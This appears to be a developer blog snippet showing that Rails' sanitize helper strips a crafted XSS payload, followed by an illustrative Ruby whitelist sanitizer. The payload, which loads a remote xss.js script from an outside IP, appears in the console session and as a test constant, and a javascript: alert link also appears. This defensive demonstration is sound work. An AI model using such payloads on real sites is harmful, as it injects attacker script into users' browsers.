It is good to know that we Rails developers are well covered…
$ ruby script/console
Loading development environment (Rails 2.1.0)
>> text = '<img src=http://www.a.com/a.jpg<script type=text/javascript src=http://1.2.3.4:81/xss.js /><img src=http://www.a.com/a.jpg</script>'
>> include ActionView::Helpers::SanitizeHelper
>> sanitize(text)
=> "<img src= /><img src= />"
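As an added illustration of why a whitelist sanitizer survives this kind of payload, here is a small stand-alone Ruby sanitizer. It is example code written for this page, not ActionView's own implementation, and the tag, attribute and protocol lists as well as every function name are hypothetical. The point it demonstrates: output is re-serialized from a parsed token stream using only whitelisted tags and attributes, so a `<script` nested inside an `<img` attribute is either seen as its own tag and dropped, or escaped as text; it never reaches the browser as markup.

```ruby
require 'cgi'
require 'strscan'

# Hypothetical allow-lists for this example (not Rails' defaults).
ALLOWED_TAGS      = %w[a b i em strong p br img].freeze
ALLOWED_ATTRS     = %w[href src alt title].freeze
URI_ATTRS         = %w[href src].freeze
ALLOWED_PROTOCOLS = %w[http https mailto].freeze
RAW_TEXT_TAGS     = %w[script style].freeze   # their contents are never emitted

# Split markup into [:tag, body] / [:text, body] tokens. A tag runs from '<' to
# the first '>' outside quotes; an unquoted '<' inside a tag starts a new tag,
# so a '<script' smuggled into an attribute value is judged by the whitelist
# as a tag instead of slipping through as attribute text.
def tokenize(html)
  s = StringScanner.new(html)
  tokens = []
  until s.eos?
    unless s.check(%r{</?[a-zA-Z]})
      tokens << [:text, s.scan(/<?[^<]*/)]    # a bare '<' is just text
      next
    end
    tag = s.getch                             # the '<'
    until s.eos?
      c = s.getch
      if c == ">"
        tag << c
        break
      elsif c == "<"
        s.pos -= 1                            # unquoted '<' starts the next tag
        break
      elsif c == '"' || c == "'"
        tag << c << (s.scan_until(/#{c}/) || s.scan(/.*/m))  # quoted value may hold < or >
      else
        tag << c
      end
    end
    tokens << [:tag, tag]
  end
  tokens
end

# Parse "<name attr=value ...>" into [name, closing?, self_closing?, attrs].
# Like a browser, the first occurrence of a repeated attribute wins.
def parse_tag(tag)
  s = StringScanner.new(tag)
  s.skip(/</)
  closing = !s.skip(%r{/}).nil?
  name = s.scan(/[a-zA-Z][-\w:]*/)
  attrs = {}
  loop do
    s.skip(/\s+/)
    attr = s.scan(/[-\w:]+/) or break
    value = nil                               # nil means a bare attribute such as "disabled"
    if s.skip(/\s*=\s*/)
      value = if (q = s.scan(/["']/))
                v = s.scan(/[^#{q}]*/); s.skip(/#{q}/); v
              else
                s.scan(/[^\s>]*/)
              end
    end
    attrs[attr.downcase] = value unless attrs.key?(attr.downcase)
  end
  [name.downcase, closing, tag.end_with?("/>"), attrs]
end

# Reject URI attributes whose scheme is not allowed. Control characters and
# spaces are removed before the check because browsers ignore them inside a
# scheme ("jav\tascript:" runs). Relative URLs (no scheme) pass. Entity forms
# such as "jav&#x09;ascript:" stay inert because '&' is re-escaped on output.
def safe_uri?(attr, value)
  return true unless URI_ATTRS.include?(attr) && value
  scheme = value.gsub(/[\x00-\x20]/, "")[/\A([a-zA-Z][\w+.-]*):/, 1]
  scheme.nil? || ALLOWED_PROTOCOLS.include?(scheme.downcase)
end

def whitelist_sanitize(html)
  out = String.new
  raw = nil                                   # RAW_TEXT_TAGS element we are currently inside
  tokenize(html).each do |kind, body|
    if kind == :text
      out << CGI.escapeHTML(body) unless raw
      next
    end
    name, closing, self_closing, attrs = parse_tag(body)
    if raw
      raw = nil if closing && name == raw     # drop everything up to the matching close tag
      next
    end
    if closing
      out << "</#{name}>" if ALLOWED_TAGS.include?(name)
      next
    end
    unless ALLOWED_TAGS.include?(name)
      raw = name if RAW_TEXT_TAGS.include?(name) && !self_closing
      next
    end
    kept = attrs.select { |k, v| ALLOWED_ATTRS.include?(k) && safe_uri?(k, v) }
    out << "<#{name}"
    kept.each { |k, v| out << (v.nil? ? " #{k}" : %( #{k}="#{CGI.escapeHTML(v)}")) }
    out << ">"
  end
  out
end

# The payload from the console session above, constructed here as a literal.
PAYLOAD = '<img src=http://www.a.com/a.jpg<script type=text/javascript src=http://1.2.3.4:81/xss.js /><img src=http://www.a.com/a.jpg</script>'

if __FILE__ == $PROGRAM_NAME
  puts whitelist_sanitize(PAYLOAD)
  puts whitelist_sanitize('<a href="javascript:alert(1)" title="x">click</a>')
end
```

Run against the payload this yields two plain `<img src="http://www.a.com/a.jpg">` tags and nothing else; the exact string differs from what Rails 2.1 printed above because the two sanitizers serialize differently, but the property is the same: the `<script ...>` and `</script>` fragments are dropped as non-whitelisted tags and no markup is copied from the input. The `javascript:` and tab-obfuscated `jav<TAB>ascript:` cases show why the protocol check must normalize before matching.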